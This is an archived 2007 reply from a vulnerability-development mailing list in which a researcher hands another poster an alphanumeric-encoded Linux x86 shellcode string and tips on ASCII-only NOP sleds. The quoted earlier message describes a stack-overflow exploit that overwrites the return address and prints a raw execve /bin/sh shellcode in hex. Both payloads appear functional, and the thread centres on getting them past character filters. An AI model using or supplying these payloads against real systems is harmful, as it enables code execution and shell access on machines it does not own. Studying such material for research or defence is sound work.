Vulnerability Development mailing list archives
Re: Linux restricted ASCII Shellcode
From: shadown <shadown () gmail com>
Date: Mon, 23 Apr 2007 09:58:49 +0200
Hi, Here you have you shellcode in ascii format. 'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY19II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T' If the code you are trying to exploit does NOT allow nonASCII nops (that actually is the only thing that makes sence) instead of '\x90' you will have to use some ascii opcode/bytecode string that can be used as NOP sled (for example 'A' -> inc ecx). Cheers, Sergio nonexistant () nospam org wrote:
Yes I'm having a seg-fault, but I can't catch you... AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... Alignment has nothing to do here...?¿? I'm wrong? More over, I've tryed more than 5 different ASCII shellcodes all with the same result... Always segfaulting. It looks as if shellcodes where not working for any common reason... So, summarizing: 1.- I can perfectly overwrite RET thus having EIP pointing almost 100% of the time to the NOP's of my shellcode (in an environment variable) 2.- My -non-ascii- shellcode works perfectly 3.- Whn I try with ANY pure ascii shellcode, it fails 100% of the time. What is happening? I've tryed with pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others... Metasploit framework failed to convert the original shellcode -the one that works- to pure ascii with the selected charset (A-Z,a-z,0-9). That's the original shellcode: \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh Is anyone able to convert this to pure ASCII or giving me a working pure ASCII shellcode or helping me understand why all the pure ascii shellcodes are failing in my exploit? Thank you,
-- Sergio Alvarez Security, Research & Development IT Security Consultant email: shadown () gmail com This message is confidential. It may also contain information that is privileged or otherwise legally exempt from disclosure. If you have received it by mistake please let us know by e-mail immediately and delete it from your system; should also not copy the message nor disclose its contents to anyone. Many thanks.
Current thread:
- Linux restricted ASCII Shellcode notexist (Apr 16)
- Re: Linux restricted ASCII Shellcode Jerome Athias (Apr 16)
- Re: Linux restricted ASCII Shellcode nnp (Apr 16)
- <Possible follow-ups>
- Re: Re: Linux restricted ASCII Shellcode nonexistant (Apr 19)
- Re: Linux restricted ASCII Shellcode Deian Stefan (Apr 20)
- Re: Re: Linux restricted ASCII Shellcode RaiSe (Apr 24)
- Re: Re: Linux restricted ASCII Shellcode nonexistant (Apr 22)
- Re: Re: Linux restricted ASCII Shellcode Deian Stefan (Apr 22)
- Re: Linux restricted ASCII Shellcode shadown (Apr 24)
- Re: Linux restricted ASCII Shellcode shadown (Apr 24)
- Re: Linux restricted ASCII Shellcode Jerome Athias (Apr 16)